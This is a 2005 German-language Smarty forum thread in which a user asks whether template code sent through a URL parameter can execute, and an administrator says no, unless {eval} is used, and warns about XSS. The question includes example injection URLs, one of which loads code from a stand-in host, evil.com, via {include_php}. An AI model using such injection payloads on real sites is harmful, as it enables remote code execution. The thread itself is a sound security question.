 |
Smarty
WARNING: All discussion is moving to https://reddit.com/r/smarty, please go there! This forum will be closing soon. |
|
| View previous topic :: View next topic |
| Author |
Message |
enjaxx
Smarty n00b
Joined: 07 Feb 2005
Posts: 2
|
 Posted: Mon Feb 07, 2005 9:20 pm Post subject: Frage zur Sicherheit |
 |
|
Hallo Leute,
bin seit einigen Tagen begeisterter Nutzer von Smarty, habe aber noch 1-2 Fragen zur Sicherheit:
1. Ist es möglich, über einen Request Smarty- oder PHP-Code in die Tempaltes einzuschleusen? Beispiel:
Aufruf:
http://www.test.com/test.php?test={php}phpinfo();{/php}
test.php:
| Code: |
$smarty->assign("ausgabe",$_GET["test"]);
$smarty->display("template.tpl");
|
template.tpl:
| Code: |
<html>
<body>
{$ausgabe}
</body>
</html>
|
Das "phpinfo()" wird nicht ausgeführt, das habe ich schon getestet, ich würde nur gerne wissen, ob das so "normal" ist, oder mein Server so eingestellt ist. Verhindert Smarty das Parsen von zugewiesenen Variablen selbst, oder muss ich beim Zuweisen (assign) darauf achten, dass der zugewiesene Inhalt "sauber" ist?
2. Dasselbe Szenrio, nur ohne PHP-Tags:
http://www.test.com/test.php?test={include_php}http://www.evil.com/bad_code.php{/include_php}
Die $security-Einstellungen dienen, soweit ich verstanden habe, dazu, böswillige Template-Ersteller einzuschränken. Wenn ich keine solchen habe, muss ich trotzdem auf etwas achten, wie z.B. auf die obige Fälle?
Danke für die Hilfe!
Gruss
enjaxx |
|
| Back to top |
|
messju
Administrator
Joined: 16 Apr 2003
Posts: 3336
Location: Oldenburg, Germany
|
| Posted: Mon Feb 07, 2005 9:40 pm Post subject: |
|
|
nein, das ist so nicht möglich.
nur wenn du {eval} verwendest (was ohnehin verboten gehört und selten einen mehrwert bietet) musst du auf solche dinge achten.
du musst natürlich darauf achten cross-site-scripting auszuschliessen und richtiges (je nach context) escaping/encoding deiner ausgaben sicherzustellen. |
|
| Back to top |
|
enjaxx
Smarty n00b
Joined: 07 Feb 2005
Posts: 2
|
| Posted: Wed Feb 09, 2005 11:57 am Post subject: |
|
|
| messju wrote: | | nein, das ist so nicht möglich. |
Super, danke für die schnelle Hilfe. 
Gruss
enjaxx |
|
| Back to top |
|
|
|
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
Powered by phpBB © 2001, 2005 phpBB Group
|
